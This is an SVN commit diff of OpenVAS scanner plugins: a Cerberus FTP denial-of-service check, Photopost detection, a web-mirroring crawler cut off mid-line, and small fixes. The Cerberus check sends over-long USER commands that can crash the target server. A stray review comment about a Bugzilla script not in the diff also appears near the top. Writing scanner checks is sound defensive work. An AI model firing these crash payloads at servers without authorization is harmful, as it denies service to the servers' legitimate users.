trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl =================================================================== --- trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl 2009-10-02 
11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl 2009-10-02 17:48:14 UTC (rev 5358) 
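Review bot: in bugzilla_36373.nasl the version ranges do not match the affected versions given in the description. The text lists 2.23.4 through 3.0.8, but the code tests test_version:"2.23", test_version2:"2.23.4" (2.23.4 as the upper bound, not the lower one) and adds a "2.4" to "2.9" range that the description does not mention. Please derive the ranges from the advisory text or correct the text. The can_host_php() test before the version lookup also does not fit a Perl application such as Bugzilla.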
@@ -0,0 +1,115 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Cerberus FTP Server Long Command Remote Denial of Service Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100284); + script_bugtraq_id(36390); + script_version ("1.0-$Revision$"); + + script_name("Cerberus FTP Server Long Command Remote Denial of Service Vulnerability"); + +desc = "Overview: +Cerberus FTP Server is prone to a denial-of-service vulnerability. + +An attacker can exploit this issue to terminate the affected +application, denying service to legitimate users. + +This issue affects Cerberus FTP Server 3.0.3 through 3.0.6; other +versions may also be affected. 
+ +References: +http://www.securityfocus.com/bid/36390 +http://www.cerberusftp.com/index.html +http://www.securityfocus.com/archive/1/506858 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Cerberus FTP Server is prone to a denial-of-service vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("FTP"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl"); + script_require_ports("Services/ftp", 21); + exit(0); +} + +include("ftp_func.inc"); + +if(safe_checks())exit(0); + +ftpPort = get_kb_item("Services/ftp"); +if(!ftpPort){ + ftpPort = 21; +} + +if(get_kb_item('ftp/'+ftpPort+'/broken'))exit(0); + +if(!get_port_state(ftpPort)){ + exit(0); +} + +if(!banner = get_ftp_banner(port:ftpPort))exit(0); + +if("Cerberus" >!< banner)exit(0); + +soc1 = open_sock_tcp(ftpPort); +soc2 = open_sock_tcp(ftpPort); +soc3 = open_sock_tcp(ftpPort); +soc4 = open_sock_tcp(ftpPort); + +if(!soc1 || !soc2 || !soc3 || !soc4){ + exit(0); +} + +req1 = string("USER ", crap(data: raw_string(0x41), length: 330), "\r\n"); +req2 = string("USER ", crap(data: raw_string(0x41), length: 520), "\r\n"); +req3 = string("USER ", crap(data: raw_string(0x41), length: 2230), "\r\n"); + +send(socket:soc1, data:req1); +send(socket:soc2, data:req2); +send(socket:soc3, data:req3); +send(socket:soc4, data:req1); + +close(soc1); +close(soc2); +close(soc3); +close(soc4); + +sleep(3); + +soc = open_sock_tcp(ftpPort); + +if(!ftp_recv_line(socket: soc)) { + security_warning(port:ftpPort); + if(soc)close(soc); + exit(0); +} + +if(soc)close(soc); + +exit(0); Property changes on: trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/misc_func.inc 
=================================================================== --- trunk/openvas-plugins/scripts/misc_func.inc 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/misc_func.inc 2009-10-02 17:48:14 UTC (rev 5358) @@ -3,6 +3,27 @@ # (C) 2002 Michel Arboi # $Revision: 1.53 $ +function get_unknown_svc() + { + + local_var port; + + if(!isnull(_FCT_ANON_ARGS[0])) { + port = _FCT_ANON_ARGS[0]; + } else { + port = get_kb_item("Services/unknown"); + } + + if(!port)return 0; + if (port == 139)return 0; + + if(service_is_unknown(port:port)) { + return port; + } else { + return 0; + } + } + function register_service(port, proto, ipproto) { local_var k; Added: trunk/openvas-plugins/scripts/photopost_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/photopost_detect.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/photopost_detect.nasl 2009-10-02 17:48:14 UTC (rev 5358) 
@@ -0,0 +1,105 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Photopost Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running Photopost, a photo sharing gallery software. 
+ +See also: +http://www.photopost.com/ + +Risk factor : None"; + +if (description) +{ + script_id(100285); + script_version ("1.0-$Revision$"); + + script_name("Photopost Detection"); + script_description(desc); + script_summary("Checks for the presence of Photopost"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); + +if(!get_port_state(port))exit(0); +if(!can_host_php(port:port))exit(0); + +dirs = make_list("/photopost","/photos","/gallery",cgi_dirs()); + +foreach dir (dirs) { + + url = string(dir, "/index.php"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE); + if( buf == NULL )continue; + + if(egrep(pattern: "]+>Photo Sharing Gallery by PhotoPost", string: buf, icase: TRUE) && + egrep(pattern: "Copyright.*All Enthusiast, Inc", string: buf, icase: TRUE) + ) + { + if(strlen(dir)>0) { + install=dir; + } else { + install=string("/"); + } + + vers = string("unknown"); + + set_kb_item(name: string("www/", port, "/photopost"), value: string(vers," under ",install)); + + info = string("None\n\nPhotoPost Version '"); + info += string(vers); + info += string("' was detected on the remote host in the following directory(s):\n\n"); + info += string(install, "\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } +} +exit(0); + Property changes on: trunk/openvas-plugins/scripts/photopost_detect.nasl ___________________________________________________________________ Name: svn:keywords 
+ Id Revision Modified: trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl =================================================================== --- trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -68,7 +68,7 @@ req = http_get(port: port, item: strcat(dir, "/", fil)); r = http_keepalive_send_recv(port:port, data: req); p = strcat("SCRIPT_FILENAME:*", fil); - if (match(string: r, pattern: p) || r =~ 'DOCUMENT_ROOT:[ \t]*[A-Z]\\\\') + if (r && (match(string: r, pattern: p) || r =~ 'DOCUMENT_ROOT:[\t]*[A-Z]\\\\')) { security_warning(port); exit(0); Modified: trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -87,8 +87,8 @@ exit(0); } -sndReq = http_get(item:"/", port:surge_port); -rcvRes = http_send_recv(port:surge_port, data:sndReq); +sndReq = http_get(item:"/", port:surgemail_port); +rcvRes = http_send_recv(port:surgemail_port, data:sndReq); if(egrep(pattern:"SurgeMail", string:rcvRes, icase:1)) { Added: trunk/openvas-plugins/scripts/webmirror.nasl =================================================================== --- trunk/openvas-plugins/scripts/webmirror.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/webmirror.nasl 2009-10-02 17:48:14 UTC (rev 5358) 
@@ -0,0 +1,1200 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# WEBMIRROR 2.0 +# +# Saved from +# http://patch-tracker.debian.org/patch/misc/view/nessus-plugins/2.2.10-6/scripts/webmirror.nasl +# +# Authors: +# Renaud Deraison . +# +# includes some code by H D Moore +# +# Modified by Michael Meyer +# +# Copyright: +# Copyright (c) 2001 - 2003 Renaud Deraison +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(10662); + script_version("$Revision$"); + script_name("Web mirroring"); + + desc = " +This script makes a mirror of the remote web site(s) +and extracts the list of CGIs that are used by the remote +host. + +It is suggested you give a high timeout value to +this plugin and that you change the number of +pages to mirror in the 'Options' section of +the client. 
+ +Risk factor : None"; + + script_description(desc); + script_summary("Performs a quick web mirror"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is Copyright (C) 2001 - 2003 Renaud Deraison"); + script_family("Web application abuses"); + script_dependencie("find_service.nes", "httpver.nasl", "DDI_Directory_Scanner.nasl"); + script_require_ports("Services/www", 80); + script_add_preference(name:"Number of pages to mirror : ", + type:"entry", + value:"200"); + script_add_preference(name:"Start page : ", + type:"entry", + value:"/"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + + +#-------------------------------------------------------------------------# +function my_http_recv(socket) +{ + local_var h, b, l; + + h = http_recv_headers2(socket:socket); + if(!h)return(NULL); + + if("Content-Type" >< h) + { + if(!egrep(pattern:"^Content-Type: text/(xml|html)", string:h))return(h); + } + + b = http_recv_body(socket: socket, headers: h, length:0); + return (string(h, "\r\n", b)); +} + + + +function my_http_keepalive_recv() +{ + local_var headers, body, length, tmp, chunked, killme; + + killme = 0; + length = -1; + headers = http_recv_headers2(socket:__ka_socket); + if(strlen(headers) == 0)headers = http_recv_headers2(socket:__ka_socket); + + if(ereg(pattern:"^HEAD.*HTTP/.*", string:__ka_last_request)) + { + # HEAD does not return a body + return(headers); + } + + if("Content-Type" >< headers) + { + if(!egrep(pattern:"^Content-Type: text/(xml|html)", string:headers)) + { + http_close_socket(__ka_socket); + __ka_socket = 0; + return(headers); + } + } + + if("Content-Length" >< headers) + { + tmp = egrep(string:headers, pattern:"^Content-Length: [0-9]*"); + length = int(ereg_replace(string:tmp, pattern:"^Content-Length: ([0-9]*)", replace:"\1")); + } + + + + if((length < 0) && (egrep(pattern:"transfer-encoding: chunked", string:headers, icase:TRUE))) + { + while(1) + { + tmp = 
recv_line(socket:__ka_socket, length:4096); + length = hex2dec(xvalue:tmp); + if(length > 512*1024) + { + length = 512*1024; + killme = 1; + } + body = string(body, recv(socket:__ka_socket, length:length+2, min:length+2)); + if(strlen(body) > 512*1024)killme = 1; + + if(length == 0 || killme){ + http_keepalive_check_connection(headers:headers); + return(string(headers,"\r\n", body)); # This is expected - don't put this line before the previous + } + } + } + + + if(length >= 0) + { + if(length > 512*1024)length = 512*1024; + + body = recv(socket:__ka_socket, length:length, min:length); + } + else { + # If we don't have the length, we close the connection to make sure + # the next request won't mix up the replies. + + #display("ERROR - Keep Alive, but no length!!!\n", __ka_last_request); + body = recv(socket:__ka_socket, length:16384); + http_close_socket(__ka_socket); + __ka_socket = http_open_socket(__ka_port); + } + + + + http_keepalive_check_connection(headers:headers); + return(string(headers,"\r\n", body)); +} + + + +function my_http_keepalive_send_recv(port, data) +{ + local_var id, n; + + if(data == NULL) + return; + + if(__ka_enabled == -1)__ka_enabled = http_keepalive_enabled(port:port); + + + + if(__ka_enabled == 0) + { + local_var soc, r; + soc = http_open_socket(port); + if(!soc)return NULL; + send(socket:soc, data:data); + r = my_http_recv(socket:soc); + http_close_socket(soc); + return r; + } + + + if((port != __ka_port)||(!__ka_socket)) + { + if(__ka_socket)http_close_socket(__ka_socket); + __ka_port = port; + __ka_socket = http_open_socket(port); + if(!__ka_socket)return NULL; + } + + id = stridx(data, string("\r\n\r\n")); + data = str_replace(string:data, find:"Connection: Close", replace:"Connection: Keep-Alive", count:1); + __ka_last_request = data; + n = send(socket:__ka_socket, data:data); + if(n <= 0) + { + http_close_socket(__ka_socket); + __ka_socket = http_open_socket(__ka_port); + if(__ka_socket == 0)return NULL; + send(socket:__ka_socket, 
data:data); + } + + return(my_http_keepalive_recv()); +} + +#-------------------------------------------------------------------# + + +function add_cgi_dir(dir) +{ + local_var d, dirs, req, res; + + if ( num_cgi_dirs > max_cgi_dirs ) return 0; + + req = http_get(item:string(dir, "/non-existant-", rand()), port:port); + req = my_http_keepalive_send_recv(port:port, data:req); + if(ereg(pattern:"^HTTP/[0-9]\.[0-9] 404 ", string:req)) + { + dirs = cgi_dirs(); + foreach d (dirs) + { + if(d == dir)return(0); + } + + if(isnull(CGI_Dirs_List[dir])) + { + #display(CGI_Dirs_List[dir], "\n"); + set_kb_item(name:"/tmp/cgibin", value:dir); + CGI_Dirs_List[dir] = 1; + num_cgi_dirs ++; + } + } +} + + +#--------------------------------------------------------------------------# + +function add_30x(url) +{ + if(isnull(URLs_30x_hash[url])) + { + set_kb_item(name:string("www/", port, "/content/30x"), value:url); + URLs_30x_hash[url] = 1; + } +} + + +function add_auth(url) +{ + if(isnull(URLs_auth_hash[url])) + { + set_kb_item(name:string("www/", port, "/content/auth_required"), value:url); + URLs_auth_hash[url] = 1; + if(url == "/")RootPasswordProtected = 1; + } +} + +#--------------------------------------------------------------------------# + +num_url = 0; + +function add_url(url) +{ + local_var ext, dir; + + if ( num_url > 100 ) return 0; + + if(debug > 5)display("**** ADD URL ", url, "\n"); + if(isnull(URLs_hash[url])) + { + URLs = make_list(URLs, url); + URLs_hash[url] = 0; + + url = ereg_replace(string:url, + pattern:"(.*)\?.*", + replace:"\1"); + + + ext = ereg_replace(pattern:".*\.([^\.]*)$", string:url, replace:"\1"); + if(strlen(ext) && ext[0] != "/") + { + set_kb_item(name:string("www/", port, "/content/extensions/", ext), value:url); + } + + dir = dir(url:url); + if(dir && !Dirs[dir]) + { + Dirs[dir] = 1; + set_kb_item(name:string("www/", port, "/content/directories"), value:dir); + if(isnull(URLs_hash[dir])) + { + URLs = make_list(URLs, dir); + if(Apache)URLs = 
make_list(URLs, string(dir, "/?D=A")); + else if(iPlanet)URLs = make_list(URLs, string(dir, "/?PageServices")); + URLs_hash[dir] = 0; + } + } + } +} + +function cgi2hash(cgi) +{ + local_var cur_cgi, cur_arg, i, ret; + + ret = make_list(); + + for(i=0;i= strlen(cgi))return ret; + i += 2; + break; + } + else cur_arg += cgi[i]; + } + } + cur_cgi += cgi[i]; + } + return ret; +} + +function hash2cgi(hash) +{ + local_var ret, h; + + ret = ""; + foreach h (keys(hash)) + { + ret += string(h, " [", hash[h], "] "); + } + return ret; +} + + +function add_cgi(cgi, args) +{ + local_var mydir, tmp, a, new_args, common, c; + + args = string(args); + + if(isnull(CGIs[cgi])) + { + CGIs[cgi] = args; + mydir = dir(url:cgi); + if(!CGIsDirs[mydir]) + { + CGIsDirs[mydir] = 1; + add_cgi_dir(dir:mydir); + } + } + else { + tmp = cgi2hash(cgi:CGIs[cgi]); + new_args = cgi2hash(cgi:args); + common = make_list(); + foreach c (keys(tmp)) + { + common[c] = tmp[c]; + } + + foreach c (keys(new_args)) + { + if(isnull(common[c]))common[c] = new_args[c]; + } + CGIs[cgi] = hash2cgi(hash:common); + } +} + + + +#---------------------------------------------------------------------------# + +function dir(url) +{ + return ereg_replace(pattern:"(.*)/[^/]*", string:url, replace:"\1"); +} + +function remove_cgi_arguments(url) +{ + local_var idx, cgi, cgi_args, args, arg, a, b; + + # Remove the trailing blanks + while(url[strlen(url) - 1] == " ") + { + url = substr(url, 0, strlen(url) - 2); + } + + idx = stridx(url, "?"); + if(idx < 0) + return url; + else if(idx >= strlen(url) - 1) + { + cgi = substr(url, 0, strlen(url) - 2); + add_cgi(cgi:cgi, args:""); + return cgi; + } + else + { + if(idx > 1)cgi = substr(url, 0, idx - 1); + else cgi = "."; + cgi_args = split(substr(url, idx + 1, strlen(url) - 1), sep:"&"); + foreach arg (make_list(cgi_args)) + { + arg = arg - "&"; + arg = arg - "amp;"; + a = ereg_replace(string:arg, pattern:"(.*)=.*", replace:"\1"); + b = ereg_replace(string:arg, pattern:".*=(.*)", 
replace:"\1"); + if(a != b) + args = string(args, a , " [", b, "] "); + else + args = string(args, arg, " [] "); + } + add_cgi(cgi:cgi, args:args); + return cgi; + } +} + + +function basename(name, level) +{ + local_var i; + + if(strlen(name) == 0) + return NULL; + + + for(i = strlen(name) - 1; i >= 0 ; i --) + { + if(name[i] == "/") + { + level --; + if(level < 0) + { + return(substr(name, 0, i)); + } + } + } + + # Level is too high, we return / + return "/"; +} + + + +function canonical_url(url, current) +{ + local_var num_dots, i, location ; + +#debug = int(5); + + if(debug > 1)display("***** canonical '", url, "' (current:", current, ")\n"); + + if(strlen(url) == 0) + return NULL; + + if(url[0] == "#") + return NULL; + + + if(url == "./" || url == ".") + return current; + + + if(debug > 2)display("**** canonical(again) ", url, "\n"); + + if(ereg(pattern:"[a-z]*:", string:url, icase:TRUE)) + { + if(ereg(pattern:"^http://", string:url, icase:TRUE)) + { + location = ereg_replace(string:url, pattern:"http://([^/]*)/.*", replace:"\1", icase:TRUE); + if(location != url) + { + if(location != get_host_name())return NULL; + else return remove_cgi_arguments(url:ereg_replace(string:url, pattern:"http://[^/]*/([^?]*)", replace:"/\1", icase:TRUE)); + } + } + } + else + { + if(url == "//") return "/"; + + if(ereg(pattern:"^//.*", string:url, icase:TRUE)) + { + location = ereg_replace(string:url, pattern:"//([^/]*)/.*", replace:"\1", icase:TRUE); + if(location != url) + { + if(location == get_host_name())return remove_cgi_arguments(url:ereg_replace(string:url, pattern:"//[^/]*/([^?]*)", replace:"/\1", icase:TRUE)); + } + return NULL; + } + + if(url[0] == "/") + return remove_cgi_arguments(url:url); + else + { + i = 0; + num_dots = 0; + + while(i < strlen(url) - 2 && url[i] == "." && url[i+1] == "." && url[i+2] == "/") + { + num_dots ++; + url = url - "../"; + if(strlen(url) == 0)break; + } + + while(i < strlen(url) && url[i] == "." 
&& url[i+1] == "/") + { + url = url - "./"; + if(strlen(url) == 0)break; + } + url = string(basename(name:current, level:num_dots), url); + } + + i = stridx(url, "#"); + if(i >= 0)url = substr(url, 0, i - 1); + + + if(url[0] != "/") + return remove_cgi_arguments(string("/", url)); + else + return remove_cgi_arguments(url:url); + } + return NULL; +} + + + +#--------------------------------------------------------------------# + + +function my_http_get(item, port) +{ + local_var ret, accept, idx; + + ret = http_get(item:page, port:port); + accept = egrep(string:ret, pattern:"^Accept:.*"); + ret = ret - accept; + idx = stridx(ret, string("\r\n\r\n")); + + + ret = insstr(ret, string("\r\nAccept: text/html, text/xml\r\n\r\n"), idx); + return ret; +} + + +function extract_location(data) +{ + local_var loc, url; + + + + loc = egrep(string:data, pattern:"^Location: "); + if(!loc) return NULL; + + loc = loc - string("\r\n"); + loc = ereg_replace(string:loc, + pattern:"Location: (.*)$", + replace:"\1"); + + + + url = canonical_url(url:loc, current:"/"); + if( url ) + { + add_url(url : url); + return url; + } + + return NULL; +} + + + +function retr( port, page ) +{ + local_var req, resp, q; + + if( debug )display("*** RETR ", page, "\n"); + + req = my_http_get(item:page, port:port); + resp = my_http_keepalive_send_recv(port:port, data:req); + if( resp == NULL ) exit(0); # No web server + + if(!match(pattern:"HTTP* 200 *", string:resp)) + { + if(match(pattern:"HTTP* 401 *", string:resp) || + match(pattern:"HTTP* 403 *", string:resp)) + { + add_auth(url:page); + return NULL; + } + if(match(pattern:"HTTP* 301 *", string:resp) || + match(pattern:"HTTP* 302 *", string:resp)) + { + q = egrep(pattern:"^Location:.*", string:resp); + add_30x(url:page); + + # Don't echo back what we added ourselves... 
+ if(!(("?PageServices" >< page || "?D=A" >< page) && ("?PageServices" >< q || "?D=A" >< q))) + extract_location(data:resp); + return NULL; + } + } + + if(egrep(pattern:"^Server:.*Apache.*", string:resp))Apache ++; + else if(egrep(pattern:"^Server:.*Netscape.*", string:resp))iPlanet ++; + + if(!egrep(pattern:"^Content-Type: text/(xml|html).*", string:resp)) + return NULL; + else + { + resp = strstr(resp, string("\r\n\r\n")); + if(!resp)return NULL; # Broken web server ? + resp = str_replace(string:resp, find:string("\r\n"), replace:" "); + resp = str_replace(string:resp, find:string("\n"), replace:" "); + resp = str_replace(string:resp, find:string("\t"), replace:" "); + return resp; + } +} + +#---------------------------------------------------------------------------# + + +function token_split(content) +{ + local_var i, j, k, str; + local_var ret, len, num; + + num = 0; + + ret = make_list(); + len = strlen(content); + + for (i=0;i", i); + if( j < 0)return(ret); + i = j; + } + else + if(content[i]=="<") + { + str = ""; + i ++; + + while(content[i] == " ")i ++; + + for(j = i; j < len ; j++) + { + if(content[j] == '"') + { + k = stridx(content, '"', j + 1); + if(k < 0){ + return(ret); # bad page + } + str = str + substr(content, j, k); + j = k; + } + else if(content[j] == '>') + { + if(ereg(pattern:"^(a|area|frame|meta|iframe|link|img|form|/form|input|button|textarea|select|applet)( .*|$)", string:str, icase:TRUE)) + { + num ++; + ret = make_list(ret, str); + if ( num > 50 ) return ret; # Too many items + } + break; + } + else str = str + content[j]; + } + i = j; + } + } + + return(ret); +} + + + +function token_parse(token) +{ + local_var ret, i, j, len, current_word, word_index, current_value, char; + + + ret = make_list(); + len = strlen(token); + current_word = ""; + word_index = 0; + + for( i = 0 ; i < len ; i ++) + { + if((token[i] == " ")||(token[i] == "=")) + { + while(i+1 < len && token[i+1] == " ")i ++; + if(i >= len)break; + + if(word_index == 0) + { + 
ret["nasl_token_type"] = tolower(current_word); + } + else + { + while(i+1 < len && token[i] == " ")i ++; + if(token[i] != "=") + { + ret[tolower(current_word)] = NULL; + } + else + { + i++; + char = NULL; + if(i >= len)break; + if(token[i] == '"')char = '"'; + else if(token[i] == "'")char = "'"; + + if(!isnull(char)) + { + j = stridx(token, char, i + 1); + if(j < 0) + { + if(debug)display("PARSE ERROR 1\n"); + return(ret); # Parse error + } + ret[tolower(current_word)] = substr(token, i + 1, j - 1); + while(j+1 < len && token[j+1]==" ")j++; + i = j; + } + else + { + j = stridx(token, ' ', i + 1); + if(j < 0) + { + j = strlen(token); + } + ret[tolower(current_word)] = substr(token, i, j - 1); + i = j; + } + } + } + current_word = ""; + word_index ++; + } + else { + if(i < len)current_word = current_word + token[i]; + } + } + + if(!word_index)ret["nasl_token_type"] = tolower(current_word); + return ret; +} + + +#-------------------------------------------------------------------------# + +function parse_java(elements) +{ + archive = elements["archive"]; + code = elements["code"]; + codebase = elements["codebase"]; + + if (codebase) + { + if (archive) + set_kb_item(name:string("www/", port, "/java_classfile"), value:string(codebase,"/",archive)); + if (code) + set_kb_item(name:string("www/", port, "/java_classfile"), value:string(codebase,"/",code)); + } + else + { + if (archive) + set_kb_item(name:string("www/", port, "/java_classfile"), value:archive); + if (code) + set_kb_item(name:string("www/", port, "/java_classfile"), value:code); + } +} + + + + + + + +function parse_javascript(elements, current) +{ + local_var url, pat; + + if(debug > 15)display("*** JAVASCRIPT\n"); + + pat = string(".*window\\.open\\('([^',", raw_string(0x29), "]*)'.*\\)*"); + url = ereg_replace(pattern:pat, + string:elements["onclick"], + replace:"\1", + icase:TRUE); + + + if( url == elements["onclick"]) + return NULL; + + url = canonical_url(url:url, current:current); + if( url ) + { + 
add_url(url : url); + return url; + } + + return NULL; +} + + +function parse_dir_from_src(elements, current) +{ + local_var src, dir; + + src = elements["src"]; + if( ! src ) return NULL; + + src = canonical_url(url:src, current:current); + dir = dir(url:src); + if(dir && !Dirs[dir]) + { + Dirs[dir] = 1; + set_kb_item(name:string("www/", port, "/content/directories"), value:dir); + if(isnull(URLs_hash[dir])) + { + URLs = make_list(URLs, dir); + URLs_hash[dir] = 0; + } + } +} + + +function parse_href_or_src(elements, current) +{ + local_var href; + + href = elements["href"]; + if(!href)href = elements["src"]; + + if(!href){ + return NULL; + } + + href = canonical_url(url:href, current:current); + if( href ) + { + add_url(url: href); + return href; + } +} + + +function parse_refresh(elements, current) +{ + local_var href, content, t, sub; + + content = elements["content"]; + + if(!content) + return NULL; + t = strstr(content, ";"); + if( t != NULL ) content = substr(t, 1, strlen(t) - 1); + + content = string("a ", content); + sub = token_parse(token:content); + + if(isnull(sub)) return NULL; + + href = sub["url"]; + if(!href) + return NULL; + + href = canonical_url(url:href, current:current); + if ( href ) + { + add_url(url: href); + return href; + } +} + + +function parse_form(elements, current) +{ + local_var action; + + action = elements["action"]; + + action = canonical_url(url:action, current:current); + if ( action ) + return action; + else + return NULL; +} + + +function pre_parse(data, src_page) +{ + local_var php_path, fp_save, data2; + + if ("Index of /" >< data) + { + if(!Misc[src_page]) + { + if("?D=A" >!< src_page && "?PageServices" >!< src_page) + { + misc_report = misc_report + string("Directory index found at ", src_page, "\n"); + Misc[src_page] = 1; + } + } + } + + if ("phpinfo()" >< data) + { + if(!Misc[src_page]) + { + misc_report = misc_report + string("Extraneous phpinfo() script found at ", src_page, "\n"); + Misc[src_page] = 1; + } + + } + + 
if("Fatal" >< data || "Warning" >< data) + { + data2 = strstr(data, "Fatal"); + if(!data2)data2 = strstr(data, "Warning"); + + data2 = strstr(data2, "in "); + + php_path = ereg_replace(pattern:"in ([^<]*).*", string:data2, replace:"\1"); + if (php_path != data2) + { + if (!Misc[src_page]) + { + misc_report = misc_report + string("PHP script discloses physical path at ", src_page, " (", php_path, ")\n"); + Misc[src_page] = 1; + } + } + } + + + data2 = strstr(data, "unescape"); + + if(data2 && ereg(pattern:"unescape..(%([0-9]|[A-Z])*){200,}.*", string:data2)) + { + if(!Misc[src_page]) + { + misc_report += string(src_page, " seems to have been 'encrypted' with HTML Guardian\n"); + guardian ++; + } + } + + if("CREATED WITH THE APPLET PASSWORD WIZARD WWW.COFFEECUP.COM" >< data) + { + if(!Misc[src_page]) + { + misc_report += string(src_page, " seems to contain links 'protected' by CoffeCup\n"); + coffeecup++; + } + + + } + + if("SaveResults" >< data) + { + fp_save = ereg_replace(pattern:string("(.*SaveResults.*U-File=)", quote, "(.*)", quote, ".*"), string:data, replace:"\2"); + if (fp_save != data) + { + if (!Misc[src_page]) + { + misc_report = misc_report + string("FrontPage form stores results in web root at ", src_page, " (", fp_save, ")\n"); + Misc[src_page] = 1; + } + } + } +} + + + +function parse_main(current, data) +{ + local_var tokens, elements, cgi, form_cgis, form_cgis_level, args, store_cgi; + + form_cgis = make_list(); + form_cgis_level = 0; + argz = NULL; + store_cgi = 0; + tokens = token_split(content: data); + foreach token (tokens) + { + elements = token_parse(token:token); + if(!isnull(elements)) + { + + if(elements["onclick"]) + parse_javascript(elements:elements, current:current); + + if ( elements["nasl_token_type"] == "applet") + parse_java(elements:elements); + + if(elements["nasl_token_type"] == "a" || + elements["nasl_token_type"] == "link" || + elements["nasl_token_type"] == "frame" || + elements["nasl_token_type"] == "iframe" || + 
elements["nasl_token_type"] == "area") + if( parse_href_or_src(elements:elements, current:current) == NULL) { + if(debug > 20)display("ERROR - ", token, "\n"); + } + if(elements["nasl_token_type"] == "img") + parse_dir_from_src(elements:elements, current:current); + + if(elements["nasl_token_type"] == "meta") + parse_refresh(elements:elements, current:current); + + if( elements["nasl_token_type"] == "form" ) + { + cgi = parse_form(elements:elements, current:current); + if( cgi ) + { + form_cgis[form_cgis_level] = cgi; + store_cgi = 1; + } + form_cgis_level ++; + } + + if( elements["nasl_token_type"] == "/form") + { + form_cgis_level --; + if( store_cgi != 0) add_cgi(cgi:form_cgis[form_cgis_level], args:argz); + argz = ""; + store_cgi = 0; + } + + if( elements["nasl_token_type"] == "input" || + elements["nasl_token_type"] == "select") + { + if(elements["name"]) + argz += string( elements["name"], " [", elements["value"], "] "); + } + } + } +} + + +#----------------------------------------------------------------------# +# MAIN() # +#----------------------------------------------------------------------# + + + +start_page = script_get_preference("Start page : "); +if(isnull(start_page) || start_page == "")start_page = "/"; + + +max_pages = int(script_get_preference( "Number of pages to mirror : " )); +if(max_pages <= 0)max_pages = 30; + +dirs = get_kb_list(string("www/", port, "/content/directories")); + + +num_cgi_dirs = 0; +if ( thorough_tests ) max_cgi_dirs = 1024; +else max_cgi_dirs = 16; + + + +debug = 0; + +port = get_http_port(default:80); + +if(!get_port_state(port))exit(0); + +URLs = make_list(start_page); +if(dirs) URLs = make_list(start_page, dirs); +URLs_hash[start_page] = 0; + + +Apache = 0; +iPlanet = 0; + +CGIs = make_list(); +Misc = make_list(); +Dirs = make_list(); + +CGI_Dirs_List = make_list(); + +URLs_30x_hash = make_list(); +URLs_auth_hash = make_list(); + + +Code404 = 